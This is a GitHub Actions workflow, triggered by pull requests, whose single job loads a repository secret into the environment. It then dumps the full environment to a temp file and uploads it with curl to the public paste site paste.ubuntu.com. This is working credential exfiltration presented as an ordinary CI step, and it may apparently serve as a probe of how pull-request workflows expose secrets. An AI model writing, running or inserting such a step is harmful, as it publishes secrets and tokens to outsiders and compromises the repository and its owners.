on: [pull_request]

jobs:
  export:
    runs-on: ubuntu-latest
    name: Export
    env:
      A_SECRET: ${{ secrets.A_SECRET }}
    steps:
      - uses: actions/checkout@v2
      - run: |
          f=$(mktemp)
          env > $f
          curl -v --data-urlencode "content@${f}" -d "poster=a" -d "syntax=text" -d "expiration=day" http://paste.ubuntu.com
